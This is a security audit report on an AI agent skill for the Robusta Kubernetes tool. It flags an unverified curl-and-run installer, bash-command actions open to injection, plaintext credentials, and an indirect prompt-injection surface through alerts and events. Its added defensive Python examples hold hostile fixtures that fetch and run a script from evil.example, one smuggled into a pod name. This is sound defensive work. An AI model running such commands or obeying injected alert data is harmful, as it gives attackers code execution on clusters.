RobustaDev

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH (EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, CREDENTIALS_UNSAFE)
Full Analysis
  • EXTERNAL_DOWNLOADS & REMOTE_CODE_EXECUTION (HIGH): The skill instructs the agent to download an executable script from an external domain (https://docs.robusta.dev/master/_static/robusta), grant it execution permissions (chmod +x), and run it. Since this domain is not on the Trusted Sources list, this represents an unverified remote code execution vector.
  • Evidence: SKILL.md, Workflows/Install.md, and references/Installation.md all contain the command: curl -fsSL -o robusta https://docs.robusta.dev/master/_static/robusta && chmod +x robusta && ./robusta gen-config.
  • COMMAND_EXECUTION (HIGH): The skill documents and promotes the use of actions that execute arbitrary bash commands on Kubernetes nodes and within pods.
  • Evidence: references/Actions.md defines node_bash_enricher and pod_bash_enricher, both of which take a bash_command parameter. When that parameter is built from trigger data (alert labels, event fields), the action becomes a direct command injection path.
  • DATA EXPOSURE & CREDENTIALS (MEDIUM): The workflow requires users to put highly sensitive information (Slack Bot tokens, PagerDuty API keys, Jira tokens, ServiceNow passwords) into a plain-text YAML file (generated_values.yaml). While placeholders are used in the documentation, the skill does not provide security best practices for handling this sensitive file (e.g., K8s Secrets or encryption).
  • Evidence: Workflows/ConfigureSinks.md and references/Sinks.md show multiple examples of hardcoded api_key, webhook_url, and password fields.
  • DYNAMIC EXECUTION (MEDIUM): The skill supports loading custom Python-based actions from remote Git repositories, which are executed at runtime by the Robusta runner.
  • Evidence: references/Actions.md describes the playbookRepos configuration which pulls code from external URLs like https://github.com/my-org/my-playbooks.
  • INDIRECT PROMPT INJECTION (LOW): The skill possesses a significant attack surface for indirect injection as it processes data from untrusted external sources (Prometheus alerts and Kubernetes events) and uses that data to trigger powerful capabilities like bash execution and pod deletion.
  • Ingestion points: Kubernetes Events, Prometheus Alerts (references/Triggers.md).
  • Boundary markers: Absent; data is processed directly as event objects.
  • Capability inventory: node_bash_enricher, pod_bash_enricher, delete_pod (references/Actions.md).
  • Sanitization: Absent for command parameters; regex redaction is mentioned only for log output.
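For the EXTERNAL_DOWNLOADS finding, the practical mitigation is to pin a digest of a reviewed copy of the installer and refuse the chmod +x step on mismatch. The following is an added illustration, not code from the audited skill or from Robusta: the installer bytes, the pinned digest and the file names are constructed for the example, and the function stands in for the curl/chmod/run line by operating on an already-downloaded file.

```python
import hashlib
import hmac
import os
import stat
import tempfile

# Constructed stand-in for a reviewed copy of the installer script. In a real
# rollout the operator fetches the script once, reads it, records its digest
# and pins that digest in the install procedure; nothing here is the real
# robusta artifact.
KNOWN_GOOD = b"#!/bin/sh\necho 'constructed sample installer'\n"
PINNED_SHA256 = hashlib.sha256(KNOWN_GOOD).hexdigest()


def sha256_of_file(path: str) -> str:
    """Stream the file through SHA-256 so large downloads are not read at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def install_if_verified(downloaded_path: str, pinned_sha256: str) -> bool:
    """Mark the download executable only if its digest matches the pinned one.

    On mismatch the file is deleted so a later step cannot run it by accident.
    Returns True when verified and made executable, False when rejected.
    """
    actual = sha256_of_file(downloaded_path)
    if not hmac.compare_digest(actual, pinned_sha256):
        os.remove(downloaded_path)
        return False
    mode = os.stat(downloaded_path).st_mode
    os.chmod(downloaded_path, mode | stat.S_IXUSR)  # the chmod +x step, now gated
    return True


def simulate_download(content: bytes) -> tuple:
    """Write `content` to a temp file as if curl had fetched it, then verify.

    Returns (verified, executable): whether the digest check passed and
    whether the file on disk ended up with the owner execute bit.
    """
    fd, path = tempfile.mkstemp(prefix="robusta-download-")
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    try:
        verified = install_if_verified(path, PINNED_SHA256)
        executable = os.path.exists(path) and bool(os.stat(path).st_mode & stat.S_IXUSR)
        return verified, executable
    finally:
        if os.path.exists(path):
            os.remove(path)


if __name__ == "__main__":
    print("unmodified download:", simulate_download(KNOWN_GOOD))
    print("tampered download:  ", simulate_download(KNOWN_GOOD + b"curl https://evil.example | sh\n"))
```

The digest has to come from somewhere other than the download itself (a checksum published on the same unverified host adds nothing); record it from a copy you have read, and re-pin deliberately when the upstream script changes.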
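The COMMAND_EXECUTION and INDIRECT PROMPT INJECTION findings share one root cause: a bash_command assembled from alert or event fields that an untrusted party can choose. The block below is an added example, not Robusta's own action code: the alert label sets, the kubectl command and the builder functions are constructed to show the injectable pattern next to a version that validates against the Kubernetes name grammar and quotes the result.

```python
import re
import shlex

# Constructed alert label sets in the shape a Prometheus alert carries.
# Pod names are chosen by whoever creates the pod, so they are attacker-
# influenced input as far as the playbook is concerned.
ALERT_BENIGN = {"namespace": "payments", "pod": "api-7c9d4f"}
ALERT_HOSTILE = {"namespace": "payments", "pod": "api; curl https://evil.example | sh; #"}

# RFC 1123 DNS label: the grammar Kubernetes enforces for namespace and pod names.
DNS_LABEL = re.compile(r"^[a-z0-9]([-a-z0-9]{0,61}[a-z0-9])?$")
SHELL_SEPARATORS = {";", "|", "||", "&", "&&"}


def build_command_unsafe(alert: dict) -> str:
    """The injectable pattern: alert fields interpolated straight into bash."""
    return f"kubectl -n {alert['namespace']} logs {alert['pod']} --tail=50"


def build_command_safe(alert: dict) -> str:
    """Reject anything outside the Kubernetes name grammar, then quote anyway.

    Validation is the real control; shlex.quote is defence in depth in case
    the grammar is ever relaxed. Raises ValueError on rejection.
    """
    for key in ("namespace", "pod"):
        value = alert.get(key, "")
        if not DNS_LABEL.match(value):
            raise ValueError(f"rejecting {key}={value!r}: not a valid Kubernetes name")
    return "kubectl -n {} logs {} --tail=50".format(
        shlex.quote(alert["namespace"]), shlex.quote(alert["pod"])
    )


def build_command_safe_or_none(alert: dict):
    """Convenience wrapper: the safe builder's result, or None if it rejected."""
    try:
        return build_command_safe(alert)
    except ValueError:
        return None


def shell_tokens(command: str) -> list:
    """Tokenise as a POSIX shell would, keeping ; | & as their own tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.commenters = ""  # keep '#' visible instead of swallowing the rest
    return list(lexer)


def is_single_command(command: str) -> bool:
    """True if the shell would run exactly one simple command."""
    return not any(tok in SHELL_SEPARATORS for tok in shell_tokens(command))


if __name__ == "__main__":
    for alert in (ALERT_BENIGN, ALERT_HOSTILE):
        unsafe = build_command_unsafe(alert)
        print(f"unsafe: {unsafe!r} -> single command: {is_single_command(unsafe)}")
        print(f"safe:   {build_command_safe_or_none(alert)!r}")
```

The same allow-list check belongs on every field that reaches a bash_command, a delete_pod target or any other capability in the inventory above; an alert that fails it should be logged and dropped, not "cleaned up" and run.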
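For the DATA EXPOSURE & CREDENTIALS finding, the check a practitioner wants is one that fails a commit or pipeline when generated_values.yaml still carries a literal token. The scanner below is an added example and not part of the skill or of Robusta; the YAML excerpt is constructed (key names mirror the api_key, webhook_url and password fields the evidence cites, values are made up), and the `{{ env.NAME }}` and `${NAME}` forms it accepts as non-secrets are an assumed placeholder convention, not Robusta's documented syntax.

```python
import re

# Constructed excerpt in the shape of the sink configuration the workflow
# writes into generated_values.yaml. Every value here is made up; the key
# names mirror the api_key / webhook_url / password fields the audit cites.
SAMPLE_VALUES = """\
sinksConfig:
- slack_sink:
    name: main_slack
    slack_channel: alerts
    api_key: xoxb-0000-constructed-not-a-real-token
- pagerduty_sink:
    name: pd
    api_key: "{{ env.PAGERDUTY_API_KEY }}"
- servicenow_sink:
    name: snow
    username: robusta
    password: <your-servicenow-password>
- webhook_sink:
    name: hook
    webhook_url: https://hooks.example/services/T000/B000/constructed
"""

# Keys whose value should never be a literal in a file that gets committed or
# shared. Matched case-insensitively against the whole key name.
SENSITIVE_KEY = re.compile(
    r"^\s*-?\s*(?P<key>[A-Za-z0-9_]*(?:api_key|token|password|secret|webhook_url)[A-Za-z0-9_]*)"
    r"\s*:\s*(?P<value>.*?)\s*$",
    re.IGNORECASE,
)
# Forms that are not a real secret: documentation placeholders like <...>,
# and an assumed env-var reference form like {{ env.NAME }} or ${NAME}.
PLACEHOLDER = re.compile(r"^(<[^>]+>|\{\{.*\}\}|\$\{[^}]+\})$")


def find_hardcoded_secrets(values_yaml: str) -> list:
    """Return (line_number, key) for each sensitive key holding a literal value."""
    hits = []
    for lineno, line in enumerate(values_yaml.splitlines(), start=1):
        match = SENSITIVE_KEY.match(line)
        if not match:
            continue
        value = match.group("value").strip().strip("'\"")
        if value == "" or PLACEHOLDER.match(value):
            continue
        hits.append((lineno, match.group("key")))
    return hits


if __name__ == "__main__":
    for lineno, key in find_hardcoded_secrets(SAMPLE_VALUES):
        print(f"generated_values.yaml:{lineno}: literal value for {key}; move it to a Kubernetes Secret")
```

The scanner is line-based on purpose so it runs without a YAML library; it will not see multi-line or flow-style values, so treat a clean result as necessary rather than sufficient. The remediation it points at is the one the audit asks for: keep the token in a Kubernetes Secret and let the runner resolve it at start-up instead of writing it into the values file.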
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 17, 2026, 06:03 PM